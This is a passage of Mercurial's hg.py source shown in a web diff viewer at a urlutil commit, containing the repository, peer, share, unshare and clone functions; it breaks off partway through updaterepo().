##// END OF EJS Templates
urlutil: add a `get_clone_path` function...
marmoute -
r47696:ebb13f9a default
parent child Browse files
Show More
@@ -1,1580 +1,1580 b''
1 # hg.py - repository classes for mercurial
1 # hg.py - repository classes for mercurial
2 #
2 #
3 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
3 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
4 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8
8
9 from __future__ import absolute_import
9 from __future__ import absolute_import
10
10
11 import errno
11 import errno
12 import os
12 import os
13 import shutil
13 import shutil
14 import stat
14 import stat
15
15
16 from .i18n import _
16 from .i18n import _
17 from .node import (
17 from .node import (
18 hex,
18 hex,
19 nullhex,
19 nullhex,
20 nullid,
20 nullid,
21 short,
21 short,
22 )
22 )
23 from .pycompat import getattr
23 from .pycompat import getattr
24
24
25 from . import (
25 from . import (
26 bookmarks,
26 bookmarks,
27 bundlerepo,
27 bundlerepo,
28 cacheutil,
28 cacheutil,
29 cmdutil,
29 cmdutil,
30 destutil,
30 destutil,
31 discovery,
31 discovery,
32 error,
32 error,
33 exchange,
33 exchange,
34 extensions,
34 extensions,
35 graphmod,
35 graphmod,
36 httppeer,
36 httppeer,
37 localrepo,
37 localrepo,
38 lock,
38 lock,
39 logcmdutil,
39 logcmdutil,
40 logexchange,
40 logexchange,
41 merge as mergemod,
41 merge as mergemod,
42 mergestate as mergestatemod,
42 mergestate as mergestatemod,
43 narrowspec,
43 narrowspec,
44 phases,
44 phases,
45 requirements,
45 requirements,
46 scmutil,
46 scmutil,
47 sshpeer,
47 sshpeer,
48 statichttprepo,
48 statichttprepo,
49 ui as uimod,
49 ui as uimod,
50 unionrepo,
50 unionrepo,
51 url,
51 url,
52 util,
52 util,
53 verify as verifymod,
53 verify as verifymod,
54 vfs as vfsmod,
54 vfs as vfsmod,
55 )
55 )
56 from .utils import (
56 from .utils import (
57 hashutil,
57 hashutil,
58 stringutil,
58 stringutil,
59 urlutil,
59 urlutil,
60 )
60 )
61
61
62
62
# convenience alias: release one or more locks (see mercurial.lock)
release = lock.release

# shared features: names of data items that a share can opt into sharing
# with its source repository (consumed via the b'shareditems' createopt)
sharedbookmarks = b'bookmarks'
67
67
68
68
def _local(path):
    """Return the repository module to use for a local *path*.

    A path naming a regular file is treated as a bundle (``bundlerepo``);
    anything else is handled by ``localrepo``.
    """
    expanded = util.expandpath(urlutil.urllocalpath(path))

    try:
        # Use os.stat() directly instead of os.path.isfile(): since
        # Python 3.8 the latter returns False on invalid-path exceptions,
        # and invalid paths must be reported explicitly here.
        isfile = stat.S_ISREG(os.stat(expanded).st_mode)
    except (TypeError, ValueError) as e:
        # Python 2 raises TypeError, Python 3 ValueError for bad paths.
        raise error.Abort(
            _(b'invalid path %s: %s') % (expanded, stringutil.forcebytestr(e))
        )
    except OSError:
        isfile = False

    return bundlerepo if isfile else localrepo
88
88
89
89
def addbranchrevs(lrepo, other, branches, revs):
    """Resolve branch names from a URL fragment into concrete revisions.

    ``branches`` is the ``(hashbranch, branches)`` pair produced by
    ``urlutil.parseurl``.  ``lrepo`` is a local repo used to resolve the
    special branch name ``.`` (may be falsy if unavailable); ``other`` is
    the repo/peer whose branchmap is consulted.

    Returns ``(revs, checkout)``: the (possibly extended) revision list
    and the revision that should be checked out afterwards (or None).
    """
    peer = other.peer()  # a courtesy to callers using a localrepo for other
    hashbranch, branches = branches
    if not hashbranch and not branches:
        # nothing to resolve: pass through the caller's revs unchanged
        x = revs or None
        if revs:
            y = revs[0]
        else:
            y = None
        return x, y
    if revs:
        revs = list(revs)
    else:
        revs = []

    if not peer.capable(b'branchmap'):
        # without branchmap support we cannot resolve branch names at all;
        # the hashbranch is passed through for the peer to interpret
        if branches:
            raise error.Abort(_(b"remote branch lookup not supported"))
        revs.append(hashbranch)
        return revs, revs[0]

    with peer.commandexecutor() as e:
        branchmap = e.callcommand(b'branchmap', {}).result()

    def primary(branch):
        # extend ``revs`` with the branch's heads (newest first); returns
        # whether the branch exists in the remote branchmap
        if branch == b'.':
            if not lrepo:
                raise error.Abort(_(b"dirstate branch not accessible"))
            branch = lrepo.dirstate.branch()
        if branch in branchmap:
            revs.extend(hex(r) for r in reversed(branchmap[branch]))
            return True
        else:
            return False

    for branch in branches:
        if not primary(branch):
            raise error.RepoLookupError(_(b"unknown branch '%s'") % branch)
    if hashbranch:
        # hashbranch may be a branch name or a raw revision; if it is not
        # a known branch, assume it is a revision identifier
        if not primary(hashbranch):
            revs.append(hashbranch)
    return revs, revs[0]
132
132
133
133
def parseurl(path, branches=None):
    """Parse url#branch, returning (url, (branch, branches)).

    Deprecated: moved to ``mercurial.utils.urlutil.parseurl``.
    """
    util.nouideprecwarn(
        b'parseurl(...) moved to mercurial.utils.urlutil',
        b'6.0',
        stacklevel=2,
    )
    return urlutil.parseurl(path, branches=branches)
139
139
140
140
# Map a URL scheme to the module (or factory) providing repository/peer
# objects for it.  Unknown schemes fall back to b'file' in _peerlookup().
schemes = {
    b'bundle': bundlerepo,
    b'union': unionrepo,
    b'file': _local,
    b'http': httppeer,
    b'https': httppeer,
    b'ssh': sshpeer,
    b'static-http': statichttprepo,
}
150
150
151
151
def _peerlookup(path):
    """Return the module/object that handles repositories at *path*.

    The result provides an ``instance(...)`` factory (and usually
    ``islocal``).  Entries in ``schemes`` may be either callables (like
    ``_local``) that pick a module based on the path, or modules used
    directly.
    """
    u = urlutil.url(path)
    scheme = u.scheme or b'file'
    thing = schemes.get(scheme) or schemes[b'file']
    try:
        return thing(path)
    except TypeError:
        # we can't test callable(thing) because 'thing' can be an unloaded
        # module that implements __call__
        if not util.safehasattr(thing, b'instance'):
            raise
        return thing
164
164
165
165
def islocal(repo):
    """Return True if *repo* (or a path pointing to a repo) is local."""
    if not isinstance(repo, bytes):
        # already a repo/peer object; ask it directly
        return repo.local()
    try:
        return _peerlookup(repo).islocal(repo)
    except AttributeError:
        # handler has no islocal(): treat as non-local
        return False
174
174
175
175
def openpath(ui, path, sendaccept=True):
    """Open *path* for reading: plain file if local, url.open if remote."""
    parsed = urlutil.url(path, parsequery=False, parsefragment=False)
    if not parsed.islocal():
        return url.open(ui, path, sendaccept=sendaccept)
    return util.posixfile(parsed.localpath(), b'rb')
183
183
184
184
# a list of (ui, repo) functions called for wire peer initialization;
# _peerorrepo() runs these on any object whose .local() is falsy
wirepeersetupfuncs = []
187
187
188
188
def _peerorrepo(
    ui, path, create=False, presetupfuncs=None, intents=None, createopts=None
):
    """Return a repository (or peer) object for the specified path.

    After instantiation, runs ``presetupfuncs``, then every extension's
    ``reposetup`` hook (timed and logged), and finally — for non-local
    objects — the registered ``wirepeersetupfuncs``.
    """
    obj = _peerlookup(path).instance(
        ui, path, create, intents=intents, createopts=createopts
    )
    # prefer the object's own ui (repo-level config) if it has one
    ui = getattr(obj, "ui", ui)
    for f in presetupfuncs or []:
        f(ui, obj)
    ui.log(b'extension', b'- executing reposetup hooks\n')
    with util.timedcm('all reposetup') as allreposetupstats:
        for name, module in extensions.extensions(ui):
            ui.log(b'extension', b' - running reposetup for %s\n', name)
            hook = getattr(module, 'reposetup', None)
            if hook:
                with util.timedcm('reposetup %r', name) as stats:
                    hook(ui, obj)
                ui.log(
                    b'extension', b' > reposetup for %s took %s\n', name, stats
                )
    ui.log(b'extension', b'> all reposetup took %s\n', allreposetupstats)
    if not obj.local():
        # wire peers get their own setup pass
        for f in wirepeersetupfuncs:
            f(ui, obj)
    return obj
215
215
216
216
def repository(
    ui,
    path=b'',
    create=False,
    presetupfuncs=None,
    intents=None,
    createopts=None,
):
    """Return a visibility-filtered local repository object for *path*.

    Aborts when *path* refers to a repository that is not local.
    """
    obj = _peerorrepo(
        ui,
        path,
        create,
        presetupfuncs=presetupfuncs,
        intents=intents,
        createopts=createopts,
    )
    localobj = obj.local()
    if not localobj:
        what = path or obj.url()
        raise error.Abort(_(b"repository '%s' is not local") % what)
    return localobj.filtered(b'visible')
240
240
241
241
def peer(uiorrepo, opts, path, create=False, intents=None, createopts=None):
    """Return a repository peer for the specified *path*."""
    remui = remoteui(uiorrepo, opts)
    obj = _peerorrepo(
        remui, path, create, intents=intents, createopts=createopts
    )
    return obj.peer()
248
248
249
249
def defaultdest(source):
    """return default destination of clone if none is given

    >>> defaultdest(b'foo')
    'foo'
    >>> defaultdest(b'/foo/bar')
    'bar'
    >>> defaultdest(b'/')
    ''
    >>> defaultdest(b'')
    ''
    >>> defaultdest(b'http://example.org/')
    ''
    >>> defaultdest(b'http://example.org/foo/')
    'foo'
    """
    urlpath = urlutil.url(source).path
    if urlpath:
        # last meaningful path component, ignoring trailing slashes
        return os.path.basename(os.path.normpath(urlpath))
    return b''
270
270
271
271
def sharedreposource(repo):
    """Returns repository object for source repository of a shared repo.

    If repo is not a shared repository, returns None.  The resolved
    source repo is cached on ``repo.srcrepo`` for subsequent calls.
    """
    if repo.sharedpath == repo.path:
        # not a share: sharedpath points at our own store
        return None

    if util.safehasattr(repo, b'srcrepo') and repo.srcrepo:
        # cached from an earlier call
        return repo.srcrepo

    # the sharedpath always ends in the .hg; we want the path to the repo
    source = repo.vfs.split(repo.sharedpath)[0]
    srcurl, branches = urlutil.parseurl(source)
    srcrepo = repository(repo.ui, srcurl)
    repo.srcrepo = srcrepo
    return srcrepo
289
289
290
290
def share(
    ui,
    source,
    dest=None,
    update=True,
    bookmarks=True,
    defaultpath=None,
    relative=False,
):
    """Create a shared repository.

    ``source`` may be a path (bytes) or an existing repo/peer object; it
    must be local.  ``dest`` defaults to the basename of the source.
    ``update`` may be a boolean or a revision to check out; ``bookmarks``
    controls whether bookmarks are shared; ``relative`` stores the share
    pointer as a relative path.

    Returns the newly created (re-opened) shared repository object.
    """

    if not islocal(source):
        raise error.Abort(_(b'can only share local repositories'))

    if not dest:
        dest = defaultdest(source)
    else:
        dest = ui.expandpath(dest)

    if isinstance(source, bytes):
        # path given: parse any #branch fragment and open the source repo
        origsource = ui.expandpath(source)
        source, branches = urlutil.parseurl(origsource)
        srcrepo = repository(ui, source)
        rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
    else:
        srcrepo = source.local()
        checkout = None

    shareditems = set()
    if bookmarks:
        shareditems.add(sharedbookmarks)

    r = repository(
        ui,
        dest,
        create=True,
        createopts={
            b'sharedrepo': srcrepo,
            b'sharedrelative': relative,
            b'shareditems': shareditems,
        },
    )

    postshare(srcrepo, r, defaultpath=defaultpath)
    # re-open so the new repo picks up the config written by postshare()
    r = repository(ui, dest)
    _postshareupdate(r, update, checkout=checkout)
    return r
338
338
339
339
def _prependsourcehgrc(repo):
    """Prepend the share source's config to this repo's ``.hg/hgrc``.

    Used on unshare, and only when the share was performed with the
    share-safe method where the source's config is shared.
    """
    sourcevfs = vfsmod.vfs(repo.sharedpath)
    destvfs = vfsmod.vfs(repo.path)

    if not sourcevfs.exists(b'hgrc'):
        # source has no config to carry over
        return

    existing = destvfs.read(b'hgrc') if destvfs.exists(b'hgrc') else b''

    with destvfs(b'hgrc', b'wb') as fp:
        shared = sourcevfs.read(b'hgrc')
        fp.write(b"# Config copied from shared source\n")
        fp.write(shared)
        fp.write(b'\n')
        fp.write(existing)
360
360
361
361
def unshare(ui, repo):
    """convert a shared repository to a normal one

    Copy the store data to the repo and remove the sharedpath data.

    Returns a new repository object representing the unshared repository.

    The passed repository object is not usable after this function is
    called.
    """

    with repo.lock():
        # we use locks here because if we race with commit, we
        # can end up with extra data in the cloned revlogs that's
        # not pointed to by changesets, thus causing verify to
        # fail
        destlock = copystore(ui, repo, repo.path)
        with destlock or util.nullcontextmanager():
            if requirements.SHARESAFE_REQUIREMENT in repo.requirements:
                # we were sharing .hg/hgrc of the share source with the current
                # repo. We need to copy that while unsharing otherwise it can
                # disable hooks and other checks
                _prependsourcehgrc(repo)

            # keep the old pointer around (renamed) rather than deleting it
            sharefile = repo.vfs.join(b'sharedpath')
            util.rename(sharefile, sharefile + b'.old')

            repo.requirements.discard(requirements.SHARED_REQUIREMENT)
            repo.requirements.discard(requirements.RELATIVE_SHARED_REQUIREMENT)
            scmutil.writereporequirements(repo)

    # Removing share changes some fundamental properties of the repo instance.
    # So we instantiate a new repo object and operate on it rather than
    # try to keep the existing repo usable.
    newrepo = repository(repo.baseui, repo.root, create=False)

    # TODO: figure out how to access subrepos that exist, but were previously
    # removed from .hgsub
    c = newrepo[b'.']
    subs = c.substate
    for s in sorted(subs):
        c.sub(s).unshare()

    # make any further use of the old repo object fail loudly
    localrepo.poisonrepository(repo)

    return newrepo
408
408
409
409
def postshare(sourcerepo, destrepo, defaultpath=None):
    """Called after a new shared repo is created.

    The new repo only has a requirements file and pointer to the source.
    This function configures additional shared data.

    Extensions can wrap this function and write additional entries to
    destrepo/.hg/shared to indicate additional pieces of data to be shared.
    """
    defaulturl = defaultpath or sourcerepo.ui.config(b'paths', b'default')
    if defaulturl:
        # record where the share came from as the default path
        hgrc = b'[paths]\ndefault = %s\n' % defaulturl
        destrepo.vfs.write(b'hgrc', util.tonativeeol(hgrc))
    if requirements.NARROW_REQUIREMENT in sourcerepo.requirements:
        with destrepo.wlock():
            narrowspec.copytoworkingcopy(destrepo)
426
426
427
427
def _postshareupdate(repo, update, checkout=None):
    """Maybe perform a working directory update after a shared repo is created.

    ``update`` can be a boolean or a revision to update to.
    """
    if not update:
        return

    repo.ui.status(_(b"updating working directory\n"))
    if update is not True:
        checkout = update
    # try the requested checkout first, then fall back to default/tip
    for candidate in (checkout, b'default', b'tip'):
        if candidate is None:
            continue
        try:
            uprev = repo.lookup(candidate)
        except error.RepoLookupError:
            continue
        break
    _update(repo, uprev)
448
448
449
449
def copystore(ui, srcrepo, destpath):
    """copy files from store of srcrepo in destpath

    returns destlock (the lock taken on the destination once real data
    is being written, or None; released on failure before re-raising)
    """
    destlock = None
    try:
        # hardlink is None here, so the initial topic is always b'copying';
        # util.copyfiles() returns whether hardlinking actually worked and
        # that result is threaded through subsequent calls.
        hardlink = None
        topic = _(b'linking') if hardlink else _(b'copying')
        with ui.makeprogress(topic, unit=_(b'files')) as progress:
            num = 0
            srcpublishing = srcrepo.publishing()
            srcvfs = vfsmod.vfs(srcrepo.sharedpath)
            dstvfs = vfsmod.vfs(destpath)
            for f in srcrepo.store.copylist():
                # publishing repos keep everything public; phaseroots
                # would only mark things non-public, so skip it
                if srcpublishing and f.endswith(b'phaseroots'):
                    continue
                dstbase = os.path.dirname(f)
                if dstbase and not dstvfs.exists(dstbase):
                    dstvfs.mkdir(dstbase)
                if srcvfs.exists(f):
                    if f.endswith(b'data'):
                        # 'dstbase' may be empty (e.g. revlog format 0)
                        lockfile = os.path.join(dstbase, b"lock")
                        # lock to avoid premature writing to the target
                        destlock = lock.lock(dstvfs, lockfile)
                    hardlink, n = util.copyfiles(
                        srcvfs.join(f), dstvfs.join(f), hardlink, progress
                    )
                    num += n
            if hardlink:
                ui.debug(b"linked %d files\n" % num)
            else:
                ui.debug(b"copied %d files\n" % num)
        return destlock
    except:  # re-raises
        release(destlock)
        raise
488
488
489
489
def clonewithshare(
    ui,
    peeropts,
    sharepath,
    source,
    srcpeer,
    dest,
    pull=False,
    rev=None,
    update=True,
    stream=False,
):
    """Perform a clone using a shared repo.

    The store for the repository will be located at <sharepath>/.hg. The
    specified revisions will be cloned or pulled from "source". A shared repo
    will be created at "dest" and a working copy will be created if "update" is
    True.

    Returns ``(srcpeer, destpeer)``.

    NOTE(review): the ``pull`` parameter is never read in this body — the
    inner clone() call hardcodes pull=True; confirm whether callers rely
    on passing it.
    """
    revs = None
    if rev:
        if not srcpeer.capable(b'lookup'):
            raise error.Abort(
                _(
                    b"src repository does not support "
                    b"revision lookup and so doesn't "
                    b"support clone by revision"
                )
            )

        # TODO this is batchable.
        remoterevs = []
        for r in rev:
            with srcpeer.commandexecutor() as e:
                remoterevs.append(
                    e.callcommand(
                        b'lookup',
                        {
                            b'key': r,
                        },
                    ).result()
                )
        revs = remoterevs

    # Obtain a lock before checking for or cloning the pooled repo otherwise
    # 2 clients may race creating or populating it.
    pooldir = os.path.dirname(sharepath)
    # lock class requires the directory to exist.
    try:
        util.makedir(pooldir, False)
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise

    poolvfs = vfsmod.vfs(pooldir)
    basename = os.path.basename(sharepath)

    with lock.lock(poolvfs, b'%s.lock' % basename):
        if os.path.exists(sharepath):
            ui.status(
                _(b'(sharing from existing pooled repository %s)\n') % basename
            )
        else:
            ui.status(
                _(b'(sharing from new pooled repository %s)\n') % basename
            )
            # Always use pull mode because hardlinks in share mode don't work
            # well. Never update because working copies aren't necessary in
            # share mode.
            clone(
                ui,
                peeropts,
                source,
                dest=sharepath,
                pull=True,
                revs=rev,
                update=False,
                stream=stream,
            )

    # Resolve the value to put in [paths] section for the source.
    if islocal(source):
        defaultpath = os.path.abspath(urlutil.urllocalpath(source))
    else:
        defaultpath = source

    sharerepo = repository(ui, path=sharepath)
    destrepo = share(
        ui,
        sharerepo,
        dest=dest,
        update=False,
        bookmarks=False,
        defaultpath=defaultpath,
    )

    # We need to perform a pull against the dest repo to fetch bookmarks
    # and other non-store data that isn't shared by default. In the case of
    # non-existing shared repo, this means we pull from the remote twice. This
    # is a bit weird. But at the time it was implemented, there wasn't an easy
    # way to pull just non-changegroup data.
    exchange.pull(destrepo, srcpeer, heads=revs)

    _postshareupdate(destrepo, update)

    return srcpeer, peer(ui, peeropts, dest)
596
596
597
597
# Recomputing caches is often slow on big repos, so copy them.
def _copycache(srcrepo, dstcachedir, fname):
    """copy a cache from srcrepo to destcachedir (if it exists)"""
    cachepath = srcrepo.cachevfs.join(fname)
    # Nothing to do when the source repo never populated this cache.
    if not os.path.exists(cachepath):
        return
    if not os.path.exists(dstcachedir):
        os.mkdir(dstcachedir)
    util.copyfile(cachepath, os.path.join(dstcachedir, fname))
607
607
608
608
def clone(
    ui,
    peeropts,
    source,
    dest=None,
    pull=False,
    revs=None,
    update=True,
    stream=False,
    branch=None,
    shareopts=None,
    storeincludepats=None,
    storeexcludepats=None,
    depth=None,
):
    """Make a copy of an existing repository.

    Create a copy of an existing repository in a new directory. The
    source and destination are URLs, as passed to the repository
    function. Returns a pair of repository peers, the source and
    newly created destination.

    The location of the source is added to the new repository's
    .hg/hgrc file, as the default to be used for future pulls and
    pushes.

    If an exception is raised, the partly cloned/updated destination
    repository will be deleted.

    Arguments:

    source: repository object or URL

    dest: URL of destination repository to create (defaults to base
    name of source repository)

    pull: always pull from source repository, even in local case or if the
    server prefers streaming

    stream: stream raw data uncompressed from repository (fast over
    LAN, slow over WAN)

    revs: revision to clone up to (implies pull=True)

    update: update working directory after clone completes, if
    destination is local repository (True means update to default rev,
    anything else is treated as a revision)

    branch: branches to clone

    shareopts: dict of options to control auto sharing behavior. The "pool" key
    activates auto sharing mode and defines the directory for stores. The
    "mode" key determines how to construct the directory name of the shared
    repository. "identity" means the name is derived from the node of the first
    changeset in the repository. "remote" means the name is derived from the
    remote's path/URL. Defaults to "identity."

    storeincludepats and storeexcludepats: sets of file patterns to include and
    exclude in the repository copy, respectively. If not defined, all files
    will be included (a "full" clone). Otherwise a "narrow" clone containing
    only the requested files will be performed. If ``storeincludepats`` is not
    defined but ``storeexcludepats`` is, ``storeincludepats`` is assumed to be
    ``path:.``. If both are empty sets, no files will be cloned.
    """

    if isinstance(source, bytes):
        src = urlutil.get_clone_path(ui, source, branch)
        origsource, source, branches = src
        srcpeer = peer(ui, peeropts, source)
    else:
        srcpeer = source.peer()  # in case we were called with a localrepo
        branches = (None, branch or [])
        origsource = source = srcpeer.url()
    srclock = destlock = cleandir = None
    destpeer = None
    try:
        revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)

        if dest is None:
            dest = defaultdest(source)
            if dest:
                ui.status(_(b"destination directory: %s\n") % dest)
        else:
            dest = ui.expandpath(dest)

        dest = urlutil.urllocalpath(dest)
        source = urlutil.urllocalpath(source)

        if not dest:
            raise error.InputError(_(b"empty destination path is not valid"))

        destvfs = vfsmod.vfs(dest, expandpath=True)
        if destvfs.lexists():
            if not destvfs.isdir():
                raise error.InputError(
                    _(b"destination '%s' already exists") % dest
                )
            elif destvfs.listdir():
                raise error.InputError(
                    _(b"destination '%s' is not empty") % dest
                )

        createopts = {}
        narrow = False

        if storeincludepats is not None:
            narrowspec.validatepatterns(storeincludepats)
            narrow = True

        if storeexcludepats is not None:
            narrowspec.validatepatterns(storeexcludepats)
            narrow = True

        if narrow:
            # Include everything by default if only exclusion patterns defined.
            if storeexcludepats and not storeincludepats:
                storeincludepats = {b'path:.'}

            createopts[b'narrowfiles'] = True

        if depth:
            createopts[b'shallowfilestore'] = True

        if srcpeer.capable(b'lfs-serve'):
            # Repository creation honors the config if it disabled the extension, so
            # we can't just announce that lfs will be enabled. This check avoids
            # saying that lfs will be enabled, and then saying it's an unknown
            # feature. The lfs creation option is set in either case so that a
            # requirement is added. If the extension is explicitly disabled but the
            # requirement is set, the clone aborts early, before transferring any
            # data.
            createopts[b'lfs'] = True

            if extensions.disabled_help(b'lfs'):
                ui.status(
                    _(
                        b'(remote is using large file support (lfs), but it is '
                        b'explicitly disabled in the local configuration)\n'
                    )
                )
            else:
                ui.status(
                    _(
                        b'(remote is using large file support (lfs); lfs will '
                        b'be enabled for this repository)\n'
                    )
                )

        shareopts = shareopts or {}
        sharepool = shareopts.get(b'pool')
        sharenamemode = shareopts.get(b'mode')
        if sharepool and islocal(dest):
            sharepath = None
            if sharenamemode == b'identity':
                # Resolve the name from the initial changeset in the remote
                # repository. This returns nullid when the remote is empty. It
                # raises RepoLookupError if revision 0 is filtered or otherwise
                # not available. If we fail to resolve, sharing is not enabled.
                try:
                    with srcpeer.commandexecutor() as e:
                        rootnode = e.callcommand(
                            b'lookup',
                            {
                                b'key': b'0',
                            },
                        ).result()

                    if rootnode != nullid:
                        sharepath = os.path.join(sharepool, hex(rootnode))
                    else:
                        ui.status(
                            _(
                                b'(not using pooled storage: '
                                b'remote appears to be empty)\n'
                            )
                        )
                except error.RepoLookupError:
                    ui.status(
                        _(
                            b'(not using pooled storage: '
                            b'unable to resolve identity of remote)\n'
                        )
                    )
            elif sharenamemode == b'remote':
                sharepath = os.path.join(
                    sharepool, hex(hashutil.sha1(source).digest())
                )
            else:
                raise error.Abort(
                    _(b'unknown share naming mode: %s') % sharenamemode
                )

            # TODO this is a somewhat arbitrary restriction.
            if narrow:
                ui.status(
                    _(b'(pooled storage not supported for narrow clones)\n')
                )
                sharepath = None

            if sharepath:
                return clonewithshare(
                    ui,
                    peeropts,
                    sharepath,
                    source,
                    srcpeer,
                    dest,
                    pull=pull,
                    rev=revs,
                    update=update,
                    stream=stream,
                )

        srcrepo = srcpeer.local()

        abspath = origsource
        if islocal(origsource):
            abspath = os.path.abspath(urlutil.urllocalpath(origsource))

        if islocal(dest):
            cleandir = dest

        copy = False
        if (
            srcrepo
            and srcrepo.cancopy()
            and islocal(dest)
            and not phases.hassecret(srcrepo)
        ):
            copy = not pull and not revs

        # TODO this is a somewhat arbitrary restriction.
        if narrow:
            copy = False

        if copy:
            try:
                # we use a lock here because if we race with commit, we
                # can end up with extra data in the cloned revlogs that's
                # not pointed to by changesets, thus causing verify to
                # fail
                srclock = srcrepo.lock(wait=False)
            except error.LockError:
                copy = False

        if copy:
            srcrepo.hook(b'preoutgoing', throw=True, source=b'clone')
            hgdir = os.path.realpath(os.path.join(dest, b".hg"))
            if not os.path.exists(dest):
                util.makedirs(dest)
            else:
                # only clean up directories we create ourselves
                cleandir = hgdir
            try:
                destpath = hgdir
                util.makedir(destpath, notindexed=True)
            except OSError as inst:
                if inst.errno == errno.EEXIST:
                    cleandir = None
                    raise error.Abort(
                        _(b"destination '%s' already exists") % dest
                    )
                raise

            destlock = copystore(ui, srcrepo, destpath)
            # copy bookmarks over
            srcbookmarks = srcrepo.vfs.join(b'bookmarks')
            dstbookmarks = os.path.join(destpath, b'bookmarks')
            if os.path.exists(srcbookmarks):
                util.copyfile(srcbookmarks, dstbookmarks)

            dstcachedir = os.path.join(destpath, b'cache')
            for cache in cacheutil.cachetocopy(srcrepo):
                _copycache(srcrepo, dstcachedir, cache)

            # we need to re-init the repo after manually copying the data
            # into it
            destpeer = peer(srcrepo, peeropts, dest)
            srcrepo.hook(b'outgoing', source=b'clone', node=nullhex)
        else:
            try:
                # only pass ui when no srcrepo
                destpeer = peer(
                    srcrepo or ui,
                    peeropts,
                    dest,
                    create=True,
                    createopts=createopts,
                )
            except OSError as inst:
                if inst.errno == errno.EEXIST:
                    cleandir = None
                    raise error.Abort(
                        _(b"destination '%s' already exists") % dest
                    )
                raise

            if revs:
                if not srcpeer.capable(b'lookup'):
                    raise error.Abort(
                        _(
                            b"src repository does not support "
                            b"revision lookup and so doesn't "
                            b"support clone by revision"
                        )
                    )

                # TODO this is batchable.
                remoterevs = []
                for rev in revs:
                    with srcpeer.commandexecutor() as e:
                        remoterevs.append(
                            e.callcommand(
                                b'lookup',
                                {
                                    b'key': rev,
                                },
                            ).result()
                        )
                revs = remoterevs

                checkout = revs[0]
            else:
                revs = None
            local = destpeer.local()
            if local:
                if narrow:
                    with local.wlock(), local.lock():
                        local.setnarrowpats(storeincludepats, storeexcludepats)
                        narrowspec.copytoworkingcopy(local)

                u = urlutil.url(abspath)
                defaulturl = bytes(u)
                local.ui.setconfig(b'paths', b'default', defaulturl, b'clone')
                if not stream:
                    if pull:
                        stream = False
                    else:
                        stream = None
                # internal config: ui.quietbookmarkmove
                overrides = {(b'ui', b'quietbookmarkmove'): True}
                with local.ui.configoverride(overrides, b'clone'):
                    exchange.pull(
                        local,
                        srcpeer,
                        revs,
                        streamclonerequested=stream,
                        includepats=storeincludepats,
                        excludepats=storeexcludepats,
                        depth=depth,
                    )
            elif srcrepo:
                # TODO lift restriction once exchange.push() accepts narrow
                # push.
                if narrow:
                    raise error.Abort(
                        _(
                            b'narrow clone not available for '
                            b'remote destinations'
                        )
                    )

                exchange.push(
                    srcrepo,
                    destpeer,
                    revs=revs,
                    bookmarks=srcrepo._bookmarks.keys(),
                )
            else:
                raise error.Abort(
                    _(b"clone from remote to remote not supported")
                )

        cleandir = None

        destrepo = destpeer.local()
        if destrepo:
            template = uimod.samplehgrcs[b'cloned']
            u = urlutil.url(abspath)
            u.passwd = None
            defaulturl = bytes(u)
            destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl))
            destrepo.ui.setconfig(b'paths', b'default', defaulturl, b'clone')

            if ui.configbool(b'experimental', b'remotenames'):
                logexchange.pullremotenames(destrepo, srcpeer)

            if update:
                if update is not True:
                    with srcpeer.commandexecutor() as e:
                        checkout = e.callcommand(
                            b'lookup',
                            {
                                b'key': update,
                            },
                        ).result()

                uprev = None
                status = None
                if checkout is not None:
                    # Some extensions (at least hg-git and hg-subversion) have
                    # a peer.lookup() implementation that returns a name instead
                    # of a nodeid. We work around it here until we've figured
                    # out a better solution.
                    if len(checkout) == 20 and checkout in destrepo:
                        uprev = checkout
                    elif scmutil.isrevsymbol(destrepo, checkout):
                        uprev = scmutil.revsymbol(destrepo, checkout).node()
                    else:
                        if update is not True:
                            try:
                                uprev = destrepo.lookup(update)
                            except error.RepoLookupError:
                                pass
                if uprev is None:
                    try:
                        if destrepo._activebookmark:
                            uprev = destrepo.lookup(destrepo._activebookmark)
                            update = destrepo._activebookmark
                        else:
                            uprev = destrepo._bookmarks[b'@']
                            update = b'@'
                        bn = destrepo[uprev].branch()
                        if bn == b'default':
                            # BUGFIX: format AFTER translation. The previous
                            # code interpolated `update` inside _(), so the
                            # already-formatted string could never match a
                            # message catalog entry (the sibling branch below
                            # already did this correctly).
                            status = _(b"updating to bookmark %s\n") % update
                        else:
                            status = (
                                _(b"updating to bookmark %s on branch %s\n")
                            ) % (update, bn)
                    except KeyError:
                        try:
                            uprev = destrepo.branchtip(b'default')
                        except error.RepoLookupError:
                            uprev = destrepo.lookup(b'tip')
                if not status:
                    bn = destrepo[uprev].branch()
                    status = _(b"updating to branch %s\n") % bn
                destrepo.ui.status(status)
                _update(destrepo, uprev)
                if update in destrepo._bookmarks:
                    bookmarks.activate(destrepo, update)
            if destlock is not None:
                release(destlock)
            # here is a tiny windows were someone could end up writing the
            # repository before the cache are sure to be warm. This is "fine"
            # as the only "bad" outcome would be some slowness. That potential
            # slowness already affect reader.
            with destrepo.lock():
                destrepo.updatecaches(full=True)
    finally:
        release(srclock, destlock)
        if cleandir is not None:
            shutil.rmtree(cleandir, True)
        if srcpeer is not None:
            srcpeer.close()
        if destpeer and destpeer.local() is None:
            destpeer.close()
    return srcpeer, destpeer
1067
1067
1068
1068
def _showstats(repo, stats, quietempty=False):
    """Report update statistics (updated/merged/removed/unresolved) on the ui.

    When ``quietempty`` is set and nothing happened, stay silent.
    """
    if quietempty and stats.isempty():
        return
    counts = (
        stats.updatedcount,
        stats.mergedcount,
        stats.removedcount,
        stats.unresolvedcount,
    )
    msg = _(
        b"%d files updated, %d files merged, "
        b"%d files removed, %d files unresolved\n"
    )
    repo.ui.status(msg % counts)
1084
1084
1085
1085
def updaterepo(repo, node, overwrite, updatecheck=None):
    """Update the working directory to node.

    When overwrite is set, changes are clobbered, merged else

    returns stats (see pydoc mercurial.merge.applyupdates)"""
    # Deprecated entry point: warn callers before delegating to merge.
    repo.ui.deprecwarn(
        b'prefer merge.update() or merge.clean_update() over hg.updaterepo()',
        b'5.7',
    )
    kwargs = {
        'branchmerge': False,
        'force': overwrite,
